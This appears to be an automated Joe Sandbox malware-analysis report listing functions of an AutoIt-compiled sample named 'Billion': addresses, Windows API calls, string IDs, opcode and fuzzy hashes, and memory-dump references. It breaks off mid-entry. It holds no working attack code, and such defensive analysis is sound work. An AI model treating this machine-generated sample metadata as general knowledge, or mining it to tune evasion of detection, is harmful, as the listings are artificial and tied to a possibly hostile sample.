                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: _wcslen$BuffCharUpper
                                                                                                                                                                                                                                                                                                          • String ID: STOP
                                                                                                                                                                                                                                                                                                          • API String ID: 1256254125-2411985666
                                                                                                                                                                                                                                                                                                          • Opcode ID: 054270d0bcffc8f62b4ec334aae1858f75e3c4e37094c28a4383275b1f83f344
                                                                                                                                                                                                                                                                                                          • Instruction ID: 90a031faa7db4b6bd186a15a0ae46dcf69f6a150045801014a5031b6a3f75c80
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 054270d0bcffc8f62b4ec334aae1858f75e3c4e37094c28a4383275b1f83f344
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D601C032A28A2A8BEF20AEBDDC919BF77B5BF60754B400524E421D62D1FB31D940C690
                                                                                                                                                                                                                                                                                                          Function 0019262B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                            • Part of subcall function 0013B329: _wcslen.LIBCMT ref: 0013B333
                                                                                                                                                                                                                                                                                                            • Part of subcall function 001945FD: GetClassNameW.USER32(?,?,000000FF), ref: 00194620
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00192699
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: ClassMessageNameSend_wcslen
                                                                                                                                                                                                                                                                                                          • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                                                          • API String ID: 624084870-1403004172
                                                                                                                                                                                                                                                                                                          • Opcode ID: f2abb165bf2ec98124fd92a45fdb6a9c70a360885529d829bf6925eb77fd20c2
                                                                                                                                                                                                                                                                                                          • Instruction ID: 2025842c578b1b5a8eb256c94ecfbd66f0ff9b780d83fb83c8249efb7e0d80b0
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f2abb165bf2ec98124fd92a45fdb6a9c70a360885529d829bf6925eb77fd20c2
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B201D475604228BBCF08EBA4CC91DFE7768FF56350F000619F932972C1EB315809C650
                                                                                                                                                                                                                                                                                                          Function 00192525 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                            • Part of subcall function 0013B329: _wcslen.LIBCMT ref: 0013B333
                                                                                                                                                                                                                                                                                                            • Part of subcall function 001945FD: GetClassNameW.USER32(?,?,000000FF), ref: 00194620
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00000180,00000000,?), ref: 00192593
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: ClassMessageNameSend_wcslen
                                                                                                                                                                                                                                                                                                          • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                                                          • API String ID: 624084870-1403004172
                                                                                                                                                                                                                                                                                                          • Opcode ID: 8191d3d31736c863a6ee834abcfe3bf7f7e741bea381fd43f2b7b44753a61212
                                                                                                                                                                                                                                                                                                          • Instruction ID: 53c0eb92a1f58677d3f07c00c55372268ff44fd1c41915c176f90b5c342aa98b
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8191d3d31736c863a6ee834abcfe3bf7f7e741bea381fd43f2b7b44753a61212
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4C01D675B40208BBDF04E7A0C962EFF77A9DF65344F510029BA02A7281EB70DE08C6B1
                                                                                                                                                                                                                                                                                                          Function 001925A9 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                            • Part of subcall function 0013B329: _wcslen.LIBCMT ref: 0013B333
                                                                                                                                                                                                                                                                                                            • Part of subcall function 001945FD: GetClassNameW.USER32(?,?,000000FF), ref: 00194620
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00000182,?,00000000), ref: 00192615
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: ClassMessageNameSend_wcslen
                                                                                                                                                                                                                                                                                                          • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                                                          • API String ID: 624084870-1403004172
                                                                                                                                                                                                                                                                                                          • Opcode ID: 68076234c3ee929e2de00deb8b56b231f40c583e165ad64508d45081b27255a2
                                                                                                                                                                                                                                                                                                          • Instruction ID: 29322b21da89d72c6a9d1e0e34cbb6c5c3a617530aa42781f96e9254febf7fa0
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 68076234c3ee929e2de00deb8b56b231f40c583e165ad64508d45081b27255a2
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6801D175A44108BBDF05E7A0D942EFF77A89F26344F50002AB902E3281EB719E09D6B1
                                                                                                                                                                                                                                                                                                          Function 001926B5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46windowCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                            • Part of subcall function 0013B329: _wcslen.LIBCMT ref: 0013B333
                                                                                                                                                                                                                                                                                                            • Part of subcall function 001945FD: GetClassNameW.USER32(?,?,000000FF), ref: 00194620
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 00192720
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: ClassMessageNameSend_wcslen
                                                                                                                                                                                                                                                                                                          • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                                                          • API String ID: 624084870-1403004172
                                                                                                                                                                                                                                                                                                          • Opcode ID: 9eea5c321aacd8f5924ce4527dbbaff71f8f14774f60b27db5f890c3c8c709fa
                                                                                                                                                                                                                                                                                                          • Instruction ID: 90791e727568dc096fcd8c444b61c0773dc49e85d3dda308f22627893b84dc14
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9eea5c321aacd8f5924ce4527dbbaff71f8f14774f60b27db5f890c3c8c709fa
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9EF0A475A44218B7DF08B7E4CC91FFE7768AF25754F400915F522B72C1EB715808C660
                                                                                                                                                                                                                                                                                                          Function 001C9AFD Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44windowCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                            • Part of subcall function 0013249F: GetWindowLongW.USER32(00000000,000000EB), ref: 001324B0
                                                                                                                                                                                                                                                                                                          • DefDlgProcW.USER32(?,0000002B,?,?,?), ref: 001C9B6D
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00132234: GetWindowLongW.USER32(?,000000EB), ref: 00132242
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00000401,00000000,00000000), ref: 001C9B53
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: LongWindow$MessageProcSend
                                                                                                                                                                                                                                                                                                          • String ID: (
                                                                                                                                                                                                                                                                                                          • API String ID: 982171247-2181176062
                                                                                                                                                                                                                                                                                                          • Opcode ID: 6e52577ec0e74e5eb9ffc70d7d9f08b841ecbb5a81424008c4af010c019991cc
                                                                                                                                                                                                                                                                                                          • Instruction ID: 345029ff33fffbe8e1e1f867335a58260f4345c88e4cdd202150be6ca0a782f0
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6e52577ec0e74e5eb9ffc70d7d9f08b841ecbb5a81424008c4af010c019991cc
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AD01BC30200318BBCB25AF14EC4CF6A7B66EF95364F100529FA020A5E1C772AC95DB60
                                                                                                                                                                                                                                                                                                          Function 001C8432 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 35COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                            • Part of subcall function 0013249F: GetWindowLongW.USER32(00000000,000000EB), ref: 001324B0
                                                                                                                                                                                                                                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 001C8471
                                                                                                                                                                                                                                                                                                          • GetWindowLongW.USER32(?,000000EC), ref: 001C847F
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: LongWindow
                                                                                                                                                                                                                                                                                                          • String ID: (
                                                                                                                                                                                                                                                                                                          • API String ID: 1378638983-2181176062
                                                                                                                                                                                                                                                                                                          • Opcode ID: d7edd373e13d2c66cf2dcdb7c2981ea679c3febdf0d81abba543b7fa9197f419
                                                                                                                                                                                                                                                                                                          • Instruction ID: de11cf14e1e3537c561cd5e43750823df89446944613681b29f35c3ce595e69c
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d7edd373e13d2c66cf2dcdb7c2981ea679c3febdf0d81abba543b7fa9197f419
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 52F04F35201215DFC708DF68EC48E6A77A5EB96324B21462EF926877F1DB309850DB10
                                                                                                                                                                                                                                                                                                          Function 00191461 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28windowCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 0019146F
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Message
                                                                                                                                                                                                                                                                                                          • String ID: AutoIt$Error allocating memory.
                                                                                                                                                                                                                                                                                                          • API String ID: 2030045667-4017498283
                                                                                                                                                                                                                                                                                                          • Opcode ID: 58ee8081bceb518dc5aca78c045b1610bc837a8c5b60e19dba10e5e909dd8e23
                                                                                                                                                                                                                                                                                                          • Instruction ID: d25f943f556d31d0105dbf93c5ce6e7dd9c7f4402c1052397c7415f81e7150d0
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 58ee8081bceb518dc5aca78c045b1610bc837a8c5b60e19dba10e5e909dd8e23
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 88E0D832244B187AD21027D4BC43F897A848F28B56F11442EFB98694C24FE2A490829A
                                                                                                                                                                                                                                                                                                          Function 001510B3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                            • Part of subcall function 0014FAD4: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,001510E2,?,?,?,0013100A), ref: 0014FAD9
                                                                                                                                                                                                                                                                                                          • IsDebuggerPresent.KERNEL32(?,?,?,0013100A), ref: 001510E6
                                                                                                                                                                                                                                                                                                          • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0013100A), ref: 001510F5
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 001510F0
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
                                                                                                                                                                                                                                                                                                          • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                                                                                                                                                                                                                                          • API String ID: 55579361-631824599
                                                                                                                                                                                                                                                                                                          • Opcode ID: 5c33aa3c265dd4377e4e216f68c2f820d68656e76b66f41fecaa920b36a24dd0
                                                                                                                                                                                                                                                                                                          • Instruction ID: 48bf690e2351c2fe98f5678b7d2bc3cd34c95615f85085169e345e3db06326f0
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5c33aa3c265dd4377e4e216f68c2f820d68656e76b66f41fecaa920b36a24dd0
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0FE06D706007108BD3229F34E948742BBE4AB04301F00896DE895C6791DBB4E488CB91
                                                                                                                                                                                                                                                                                                          Function 0014F114 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • __Init_thread_footer.LIBCMT ref: 0014F151
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Init_thread_footer
                                                                                                                                                                                                                                                                                                          • String ID: `5 $h5
                                                                                                                                                                                                                                                                                                          • API String ID: 1385522511-1936157198
                                                                                                                                                                                                                                                                                                          • Opcode ID: c34e3bd9deacd5b3094e9c3386af4fffe1d51c40d1d35c8636641c4d8202742c
                                                                                                                                                                                                                                                                                                          • Instruction ID: feb90ad6a0e129a06ee5789811c58d392de2d5ae6b28c3fb9aa5f017da675760
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c34e3bd9deacd5b3094e9c3386af4fffe1d51c40d1d35c8636641c4d8202742c
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 35E02635414A14CBC601D72CFC099883768EB0CB20B90017DE5128B3F39B202A43CA14
                                                                                                                                                                                                                                                                                                          Function 001A39D8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetTempPathW.KERNEL32(00000104,?,00000001), ref: 001A39F0
                                                                                                                                                                                                                                                                                                          • GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 001A3A05
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Temp$FileNamePath
                                                                                                                                                                                                                                                                                                          • String ID: aut
                                                                                                                                                                                                                                                                                                          • API String ID: 3285503233-3010740371
                                                                                                                                                                                                                                                                                                          • Opcode ID: f2190a73557fad8314baaed2410f7ee798e0c6fe917ec9be84b6f4175971f3b7
                                                                                                                                                                                                                                                                                                          • Instruction ID: 7aae7b8517f69638fe4da55aee2eec895399b496de2b46001a61527f6dad1069
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f2190a73557fad8314baaed2410f7ee798e0c6fe917ec9be84b6f4175971f3b7
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5AD05E72500328A7DA20A764AC0EFDB7E7CDB44710F0002A1BA55920D1DAB0DA85CB90
                                                                                                                                                                                                                                                                                                          Function 001C2DBE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 001C2DC8
                                                                                                                                                                                                                                                                                                          • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 001C2DDB
                                                                                                                                                                                                                                                                                                            • Part of subcall function 0019F292: Sleep.KERNEL32 ref: 0019F30A
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: FindMessagePostSleepWindow
                                                                                                                                                                                                                                                                                                          • String ID: Shell_TrayWnd
                                                                                                                                                                                                                                                                                                          • API String ID: 529655941-2988720461
                                                                                                                                                                                                                                                                                                          • Opcode ID: 3963407067126a503556846776bc624f46ff70eff7290693e9269da620454141
                                                                                                                                                                                                                                                                                                          • Instruction ID: 564e1875e97a970b3227996291bc1ad98b7505bd571441fe0de0440ccc0d0a72
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3963407067126a503556846776bc624f46ff70eff7290693e9269da620454141
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6DD0C935395314B6E668B770AD0FFE67E649B50B50F104839B349AA5D0CAA4A881C654
                                                                                                                                                                                                                                                                                                          Function 001C2DF2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 001C2E08
                                                                                                                                                                                                                                                                                                          • PostMessageW.USER32(00000000), ref: 001C2E0F
                                                                                                                                                                                                                                                                                                            • Part of subcall function 0019F292: Sleep.KERNEL32 ref: 0019F30A
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
